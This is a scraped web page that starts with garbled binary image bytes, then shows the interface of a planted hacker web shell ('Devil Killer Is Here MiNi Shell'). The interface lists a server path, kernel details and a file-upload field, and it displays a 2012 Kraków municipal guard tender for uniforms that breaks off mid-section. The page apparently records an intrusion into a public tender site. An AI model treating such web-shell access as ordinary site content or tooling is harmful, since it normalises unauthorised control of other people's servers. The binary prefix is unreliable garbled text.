JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/110742-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa elementów umundurowania</b><br>
<b>Numer ogłoszenia: 110742 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów umundurowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elementów umundurowania wykonanych wg wzoru
określonego w Rozporządzeniu Rady Ministrów z dnia 28.07.1998 r. w sprawie umundurowania  strażników gminnych i miejskich (Dz. U. z 1998 r., Nr 112 poz. 713 z późn. zmianami) oraz zgodnych  ze wzorami umundurowania  używanymi przez Straż Miejską Miasta Krakowa.

  Część 1 - kurtka olimpijka                                     - 39 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka olimpijka - materiał gabardyna o gramaturze 480 gr/mb ( przy szer. tkaniny142 cm), kolor ciemny granat, na podszewce, na plecach dwie fałdy, szerokie szlufki na pas, ściągacze gumowe po bokach, zapinanie na guziki kryte listwą, dwie kieszenie z mieszkiem  zamykane klapkami, na lewej kieszeni 7,5 cm poniżej guzika metalowego przyszyty mały ,czarny guzik (podtrzymujący identyfikator),  na pagonach oraz przy kieszeniach i rękawach - małe guziki metalowe koloru złotego z wizerunkiem orła.
      Termin dostawy: 21 maja 2012 r.

              - marynarka dwurzędowa                          -   4 szt. CPV 18.23.00.00-0
?Marynarka: materiał - elanowełna o gramaturze od 450 do 480g/mb (przy szerokości tkaniny 142 cm), 45% wełny 55%elany (+- 1%), rodzaj splotu - gabardyna, kolor identyczny z kolorem spodni, zapinana na guziki metalowe w kolorze złotym ze stylizowanym wizerunkiem orła,  kieszeń wewnętrzna, dwie kieszenie zewnętrzne wpuszczane z patką, naramienniki zapinane na guziki metalowe w kolorze złotym ze stylizowanym wizerunkiem orła.
      Termin dostawy: 21 maja 2012 r.

               - spodnie tropik                                          - 115 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 18.23.40.00-8
Spodnie: krój prosty z lampasem koloru żółtego, z przodu dwie kieszenie w karczkach biodrowych, z tyłu jedna kieszonka z wypustką na guzik, podwójne szlufki na pasek i pas główny, zapięcie specjalne regulujące obwód pasa, rozporek zapinany na guziki kryty plisą, materiał - elana 55%, wełna 45%, gramatura 360 g/mb (przy szer. tkaniny 142 cm), kolor ciemny granat
     Termin dostawy: 21 maja 2012 r.
                                  
              - spódnica tropik                                         -  2 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 18.23.20.00-4
Spódnica tropik: krój prosty szyta na indywidualne wymiary pracownic,  z przodu i z tyłu spódnicy po dwie zaszewki, zamek błyskawiczny wszyty w szwie z tyłu, rozcięcie zakładane z tyłu. Spódnica szyta bez paska, wykończona obłożeniem z tkaniny zasadniczej, całość na podszewce. Spódnica posiada 4 podwójne podtrzymywacze paska - na pasek i pas główny, materiał - tropik:  poliester 55%, wełna 45%, gramatura 360 gr/mb , kolor ciemny granat
     Termin dostawy: 21 maja 2012 r.
                                  
               -  spódnica gabardynowa                            -  7 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.23.20.00-4
Spódnica gabardyna: krój prosty szyta na indywidualne wymiary pracownic,  z przodu i z tyłu spódnicy po dwie zaszewki, zamek błyskawiczny wszyty w szwie z tyłu, rozcięcie zakładane z tyłu. Spódnica szyta bez    paska, wykończona obłożeniem z tkaniny zasadniczej, całość na podszewce. Spódnica posiada 4 podwójne podtrzymywacze paska - na pasek i pas główny, materiał - gabardyna:  poliester 55%, wełna 45%, gramatura 480 gr/mb , kolor ciemny granat
     Termin dostawy: 21 maja 2012 r.

	- spodenki dla rowerzystów			 - 56 szt. CPV 18.23.30.00-1
Spodnie krótkie wykonane z tkaniny elanobawełny (65% poliester, 35% bawełna, gramatura 270 g/m2) w kolorze czarnym, z przodu 2 kieszenie w karczkach biodrowych, z przodu na wysokości uda 2 kieszenie naszyte z mieszkiem, kryte patką zapinaną na rzep. Góra spodni wykończona paskiem szerokości 4 cm, zapięcie specjalne regulujące obwód pasa. W pasek wszyte 5 podtrzymywaczy (szlufki) na szeroki pas główny. Rozporek zapinany na guziki. Wzmocnione w kroku.
     Termin dostawy: 14 maja 2012 r.


Część 2 - mundur polowy                                         -  1 kpl
                        Oznaczenie przedmiotu zamówienia wg CPV 35.81.20.00-9
Typowa kurtka policyjno - wojskowa zapinana na guziki kryte plisą, materiał w kolorze b. ciemny granat,       4 kieszenie zewnętrzne  z przodu,  zapinane na guziki kryte plisą, pagony na ramionach zapinane na guziki, oznakowanie: napis STRAŻ MIEJSKA -minimalna wys. liter -25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle, patka na blachę na lewej  kieszeni.
Spodnie - materiał w kolorze b. ciemny granat, na szelkach, 6 kieszeni ( 2 z przodu, wpuszczane w karczek biodrowy, 4 kieszenie naszywane, zapinane na guziki  kryte plisą, umieszczone na udach z przodu i z tyłu, po dwie na każdej z  nogawek), ściągacz gumowy na nogawkach, wzmocnione w kroku, rozporek zapinany na zamek błyskawiczny kryty plisą.
Materia typu FOREMAN: 67% poliester, 33% bawełna, gramatura min. 252g/m2.
      Termin dostawy:  21 maja 2012 r.

             - spodnie do munduru polowego                -  5 szt. CPV 35.81.20.00-9
Spodnie - materiał w kolorze b. ciemny granat, na szelkach, 6 kieszeni ( 2 z przodu, wpuszczane w karczek biodrowy, 4 kieszenie naszywane, zapinane na guziki  kryte plisą, umieszczone na udach z przodu i z tyłu, po dwie na każdej z  nogawek), ściągacz gumowy na nogawkach, wzmocnione w kroku, rozporek zapinany na zamek błyskawiczny kryty plisą.
Materiał typu FOREMAN: 67% poliester, 33% bawełna, gramatura  min. 252g/m2.
      Termin dostawy:  21 maja 2012 r.

Część 3 -  kurtka przeciwdeszczowa                        -  152 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.21.10.00-1
Kurtka ? prosta, materiał - 100% poliester o gramaturze 101g/m2, kolor ciemny granat, szlifowany i powlekany żywicami z apreturą wodoodporną. Krój - w dole nakładane kieszenie z możliwością wkładania ręki z góry i z boku, zamykane patką na rzep. Całość zapinana na zamek kostkowy błyskawiczny kryty plisą, zapinaną na napy. W stójce chowany kaptur. Z przodu i z tyłu  napis STRAŻ MIEJSKA.. Oznakowanie: minimalna wys. liter - 25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle.
     Pokrowiec z szerokimi szlufkami na pas główny.
      Termin dostawy:  21 maja 2012 r.

Część 4 - koszulka polo                                          - 24 szt.
                   Oznaczenie przedmiotu zamówienia wg CPV 18.33.30.00-2
Koszulka polo z krótkim rękawem, kolor ciemny granat  - materiał 80% bawełna / 20% poliester, gramatura min. 220 g/m2, rozpinana na 3 guziki, rękawki wykończone ściągaczem, na ramionach pagony zapinane na guzik, materiał elanobawełna w kolorze koszulki, na lewej piersi patka na blachę, oznakowanie: na żółtym odblaskowym tle litery w kolorze srebrnym napis Straż Miejska, z tyłu minimalna wysokość liter 50 mm i z przodu 25 mm.
W cenie należy uwzględnić koszt naszycia na obu rękawkach emblematów, które zostaną  przekazane przez Straż Miejską wybranemu w trybie przetargu Wykonawcy 
      Termin dostawy:  21 maja 2012 r.

             - koszulka T-shirt                                              - 426 szt.   
                  Oznaczenie przedmiotu zamówienia wg CPV 18.33.00.00-8
 Koszulka bawełniana (100% bawełna) gramatura - 180 gr/m2,  kolor bardzo ciemny granat, bez nadruków.    
      Termin dostawy:  21 maja 2012 r.

Część 5 -  koszula służbowa (niebieska, dł. rękaw)    -  158 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, zapięcie wykończone imitacją plisy,  jedna kieszeń nie zapinana. Kolor niebieski.
      Termin dostawy:  21 maja 2012 r.

              - koszula letnia (niebieska, kr. rękaw)        - 187 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula w kolorze niebieskim - materiał 55% bawełna, 45% poliester, dwie kieszenie z mieszkiem i klapką zapinaną na guzik,, zapięcie wykończone imitacją plisy, na ramionach pagony. Powyżej lewej kieszeni należy wszyć klapkę o wym. 4,5 x 8 cm służącą do umocowania identyfikatora; na wysokości 1/3 od górnej krawędzi wykonać otwór obszyty nitką w kolorze koszuli .Klapka umieszczona na wys. 1,5 cm nad patką kieszeni, zapinana w dolnej części na rzep. 
      Termin dostawy:  21 maja 2012 r.

              - koszula letnia ( biała, kr. rękaw)             -  23 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, dwie kieszenie z mieszkiem i klapką zapinaną na guzik, patka na blachę - jak wyżej , zapięcie wykończone imitacją plisy, na ramionach pagony. Kolor biały.
      Termin dostawy:  21 maja 2012 r.

              - koszula służbowa (biała, dł. rękaw)        -  14 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, zapięcie wykończone imitacją plisy, jedna kieszeń nie zapinana. Kolor biały.
      Termin dostawy:  21 maja 2012 r.

Część 6 -  półbuty damskie                     		-  40 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.81.50.00-5
     Półbuty damskie skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, cholewka  gładka bez
     przeszyć.
      Termin dostawy:  21 maja 2012 r.
     
                -  półbuty damskie wyjściowe (czółenka) -  6 par CPV 18.81.50.00-5
     Czółenka damskie(klasyczne) skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, przyszwa
    gładka bez  przeszyć ozdobnych, lekko zwężająca  w zaokrąglony nosek z delikatnym zadarciem  w górę.
    Wysokość obcasa (cm): ok.5.5, rodzaj obcasa: słupek zwężający się z góry w dół.
    Termin dostawy:  21 maja 2012 r.

 	 -  półbuty męskie                                   - 97 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.81.50.00-5
     Półbuty męskie skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, cholewka  gładka bez
     przeszyć
      Termin dostawy:  21 maja 2012 r.

Część 7 - trzewiki specjalne całoroczne            -  107 par
               Oznaczenie przedmiotu zamówienia wg CPV 18.81.52.00-7
Cholewka wykonana ze skóry naturalnej - bukat bydlęcy wodoodporny, skóra licowa, dwoina 1,8-2,0 mm
 w kolorze czarnym, o wysokości min 20 cm od obcasa w wzwyż, sznurowana na uchwyty obuwnicze(system
 szybkiego sznurowania) po osiem z każdej strony, sznurowadła czarne, okrągłe. Język miechowy i kołnierz 
wykonany ze skóry świńskiej, zmiękczonej pianką PU. Kołnierz o wys. 6 cm,  wypełniony pianką lateksową 
przeszyty dwukrotnie pojedynczym szwem. Cholewka typu derbowego, w miejscu szycia rygli wzmocniona
 nitami. Podnosek utwardzony z materiału termoplastycznego. Podszewka ze skóry naturalnej 0,9-1,1 mm. 
 Podpodeszwa wykonana z materiału podpodeszwowego. Wkładka wymienna. Podeszwa czarna, gumowa,
 trudnościeralna, olejoodporna i antypoślizgowa typu WIBRAM, łączona z cholewką metodą klejenia,
 przyszywana oraz gwoździowana na czubkach i piętach.
      Termin dostawy:  21 maja 2012 r.

Część 8 - wyroby rymarskie  Oznaczenie przedmiotu zamówienia wg CPV 18.91.00.00-1
                - pas główny - srebrna klamra                   -  55 szt.
 Pas główny wykonany ze skóry bydlęcej licowej przebarwionej na wskroś, koloru czarnego z zamkniętą mizdrą, o grubości 3,0 - 3,5 mm. Na pasie ozdobne wyszycie (oficerskie), wyszycie podszyte dwoiną bydlęcą welurową, całość szyta nicią poliestrową koloru czarnego. Szerokość pasa 45 mm. Brzegi zamalowane farbą, błyszczącą, wykończeniową. Okucia pasa koloru srebrnego (sprzączka, knopiki, nity)
      Termin dostawy:  21 maja 2012 r.

    -  pas wąski -  srebrna klamra                    -  53 szt.
Pasek wąski wykonany ze skóry bydlęcej licowej, przebarwionej na wskroś, koloru czarnego z zamkniętą mizdrą, o grubości 2,5 - 3,0 mm. Pasek obszyty  nicią poliestrową koloru czarnego. Szerokość paska 30 mm. Brzegi paska zamalowane farbą, błyszczącą, wykończeniową. Okucia  paska koloru srebrnego (sprzączka, nity).       
      Termin dostawy:  21 maja 2012 r.

          -  saszetka na dokumenty                     -  32 szt.
Saszetka wykonana ze skóry świńskiej licowej, przebarwionej na wskroś, koloru czarnego, o grubości 1,4 - 1,6 mm. Okucia w kolorze czarny nikiel ( zatrzaski, nity), wymiary: 16 x 13x 5 cm, uchwyt na pas główny nitowany
Termin dostawy:  21 maja 2012 r.

  Część 9 -  skarpety letnie                                    - 826 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.31.70.00-4
      Skarpety męskie niekurczliwe w kolorze ciemny granat, bawełna 100%  z komfortowym ściągaczem i płaskim
      szwem.
      Termin dostawy:  14 maja 2012 r.

               - skarpety sportowe                      		 - 160 par CPV 18.31.70.00-4
      Skarpety męskie frotte  w kolorze: białym, materiał:  bawełna 80% + poliamid 20%  ze ściągaczem
      i płaskim  szwem.
     Termin dostawy:  14 maja 2012 r.

   Część 10  -  czapki   Oznaczenie przedmiotu zamówienia wg CPV 18.42.33.20-5
                  -  czapka garnizonowa                         -  30 szt.(22- zwykłe, 8 - 1 galon)
Czapka garnizonowa - materiał gabardyna w kolorze ciemny granat, otok w kolorze żółto - granatowym, orzełek metalowy ze wstęgą i napisem  STRAŻ MIEJSKA  w kolorze żółtym, daszek lakierowany na czarno, nad daszkiem czarny pasek skórzany przypięty do otoku dwoma małymi guzikami metalowymi z wizerunkiem orła w kolorze żółtym. 
      Termin dostawy:  21 maja 2012 r.

             -  czapka letnia                                      -  118 szt.  
Czapka letnia typ (baseball) w kolorze ciemny granat z otokiem żółto - granatowym oraz z  wyhaftowanym mechanicznie emblematem orła ze wstęgą  i napisem STRAŻ MIEJSKA  w kolorze żółtym, posiadająca miękki potnik i regulację z tyłu.
      Termin dostawy:  21 maja 2012 r.

 Część 11 -  krawat służbowy - bezpieczny            - 150 szt.
                  Oznaczenie przedmiotu zamówienia wg CPV 18.42.30.00-0
      Krawat żakardowy gładki w kolorze ciemny granat, typ bezpieczny  ( zapinany na rzep), szerokość
     w dolnej części - 9,5 cm.
    Termin dostawy:  21 maja 2012 r.

Część 12 - emblemat Straż Miejska 		- 3000 szt. CPV 18.42.00.00-9
Emblemat miasta Krakowa w kształcie wydłużonego owalu o wymiarach 9,5 cm x 11,5 cm wykonany techniką haftu komputerowego, tło bardzo ciemny granat, obszycie koloru żółtego, według wzoru używanego przez Straż Miejską Miasta Krakowa
      Termin dostawy:  14 maja 2012 r.

	 - znak identyfikacyjny, haftowany 	- 427 kpl. (kpl - 2 znaki haftowane i 5      podkładów z rzepem) CPV 18.42.00.00-9
Znak identyfikacyjny, haftowany, mocowany na rzepie z indywidualnym numerem i nazwą miejscowości KRAKÓW. Wymiar patki 7,5 cm x 8,5 cm w kolorze bardzo ciemny granat. Znak identyfikacyjny w kształcie owalu o wymiarach 7 cm x 6 cm, z wizerunkiem orła i szarfą koloru żółtego z napisem STRAŻ MIEJSKA, wykonany nicią metalizowaną w kolorze złotym o wzmożonym reżimie użytkowym, tj. umożliwiającym pranie i konserwację w temp. do 90 st. C. Numer indywidualny, nazwa miejscowości w kolorze czarnym na białym tle.
      Termin dostawy:  14 maja 2012 r.

Część 13 - Buty sportowe rowerowe 		- 70 par CPV 18.82.00.00-3
Sznurowane, oddychająca wierzchnia warstwa buta, podeszwa środkowa z systemem SPD i podeszwa
gumowa poprawiające skuteczność pedałowania i wygodę chodzenia, schowek na sznurowadło chroni przed ich wkręceniem w łańcuch, łatwa do zdjęcia płytka podeszwy. Kolor czarny z elementami odblaskowymi.
      Termin dostawy:  14 maja 2012 r.

	- Buty sportowe (patrol wodny) 		- 15 par CPV 18.82.00.00-3
Sznurowane, oddychająca wierzchnia warstwa buta, podeszwa środkowa i podeszwa gumowa poprawiające wygodę chodzenia, schowek na sznurowadło. Kolor jednolity czarny.
      Termin dostawy:  14 maja 2012 r.

Część 14 - kurtka rowerowa 			- 70 szt. CPV 18.22.32.00-0
Wiatroszczelna, wodoodporna kurtka rowerowa z membraną w kolorze ciemny granat (zbliżony do czarnego). Rozpinana z przodu na całej długości. Suwak zamka po zamknięciu chowa się w specjalnej kieszonce zapobiegając zadrapaniu szyi i twarzy. Stójka wysoka usztywniana z wykończeniem wewnętrznym wykonanym z materiału typu polar. Zintegrowany i regulowany kaptur w stójce. Z przodu dwie zewnętrzne kieszenie na zamek i kieszeń wewnętrzna zapinana na zamek. W dolnej części pleców jednokomorowa kieszeń na zamek.. Podszewka z siatki. Po odpięciu rękawów może być używana jako kamizelka. Mankiety przedłużonych rękawów wyposażone w regulacje obwodu na rzep i elementy odblaskowe. W dolnej części kurtki regulacja obwodu. Tył kurtki przedłużany. Elementy odblaskowe z przodu i tyłu. Oznakowanie -  na plecach napis STRAŻ MIEJSKA wykonany  czcionką o wysokości 50 mm w kolorze srebrzystym na żółtym odblaskowym tle; z przodu po lewej stronie taki sam napis wykonany czcionką o wysokości 25 mm.
      Termin dostawy:  14 maja 2012 r.

Część 15 - rękawiczki rowerowe 			- 70 par CPV 18.42.40.00-7
Wierzchnia część z przewiewnej elastycznej tkaniny poliamidowej i bawełnianego frotte, dłoń
z przewiewnego poliestru z ergonomicznie kształtowaną wyściółką żelową z syntetycznej skóry, ze
wzmocnieniami w miejscach narażonych na ścieranie,  neoprenowy mankiet zapinany na rzep. 
Kolor: czarny
      Termin dostawy:  14 maja 2012 r.

Część 16 - kaski rowerowe 				- 70 szt. CPV 18.44.41.12-1
Kask wykonany w technologii, która przy niskiej wadze kasku  zapewnia dużą wytrzymałość.
Z otworami przednimi i tylnymi odprowadzającymi nadmiar ciepła w ilości co najmniej 25.
Łatwe i szybkie dopasowanie wielkości kasku z regulacją rozmiaru (obwodu), miękka wyściółka zwiększająca komfort noszenia, siatka z przodu przeciwko owadom.
Kolor jednolity czarny lub zbliżony do czarnego.
      Termin dostawy:  14 maja 2012 r.

Część 17 - oznakowanie kamizelek taktycznych 	- 260 kpl. CPV 18.42.00.00-9
Napis STRAŻ MIEJSKA - z przodu: minimalna wysokość liter 25 mm, litery w kolorze srebrnym na żółtym odblaskowym tle, wymiary 15 x 8 cm, ż napisane z kropką, mocowany na rzepie;

Napis STRAŻ MIEJSKA - z tyłu: minimalna wysokość liter 50 mm, litery w kolorze srebrnym na żółtym
odblaskowym tle, wymiary 26 x 14 cm, ż napisane z kropką, mocowany na rzepie;
      Termin dostawy:  14 maja 2012 r.



    Wykonawca winien udzielić pełnej (materiały i robocizna) gwarancji na wyroby będące
przedmiotem zamówienia na okres min. 12 miesięcy.
    
Do oferty należy dołączyć wzory oferowanych elementów umundurowania. (Załączone wzory będą zwrócone po zakończeniu postępowania)    
Do części 1, 2, 3 i 14 należy dołączyć próbki materiału z atestami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-8, 18.23.00.00-0, 18.23.40.00-8, 18.23.20.00-4, 18.23.30.00-1, 35.81.20.00-9, 18.21.10.00-1, 18.33.30.00-2, 18.33.00.00-8, 18.33.20.00-5, 18.81.50.00-5, 18.81.52.00-7, 18.91.00.00-1, 18.31.70.00-4, 18.42.33.20-5, 18.42.30.00-0, 18.42.00.00-9, 18.82.00.00-3, 18.42.40.00-7, 18.44.41.12-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium należy wnieść w kwocie:
- dla I części zamówienia  760,00 zł (siedemset sześćdziesiąt);
- dla II części zamówienia  20,00 zł (dwadzieścia); 
- dla III części zamówienia 680,00 zł (sześćset osiemdziesiąt);  
- dla IV części zamówienia  205,00 zł (dwieście pięć);
- dla V części zamówienia  335,00 (trzysta trzydzieści pięć);
- dla VI części zamówienia  335,00 zł (trzysta trzydzieści pięć);
- dla VII części zamówienia   510,00 zł (pięćset dziesięć);
- dla VIII części zamówienia  120,00 zł (sto dwadzieścia);
- dla IX części zamówienia  90,00 zł (dziewięćdziesiąt);
- dla X części zamówienia  115,00 zł (sto piętnaście);
- dla XI części zamówienia  50,00 zł (pięćdziesiąt);
- dla XII części zamówienia  935,00 zł(dziewięćset trzydzieści pięć);
- dla XIII części zamówienia  255,00 zł (dwieście pięćdziesiąt pięć);
- dla XIV części zamówienia  375,00 zł (trzysta siedemdziesiąt pięć);
- dla XV części zamówienia  80,00 zł (osiemdziesiąt);
- dla XVI części zamówienia   335,00 zł (trzysta trzydzieści pięć);
- dla XVII części zamówienia  195,00 (sto dziewięćdziesiąt pięć).
2. Wadium może  być wnoszone w jednej lub kilku formach, wymienionych w art. 45 ust. 6 Ustawy, przy czym:
- wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek
Zamawiającego: 03 1240 4722 1111 0010 3082 8712
- przed upływem terminu składania ofert (decyduje termin wpływu środków na
rachunek Zamawiającego).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
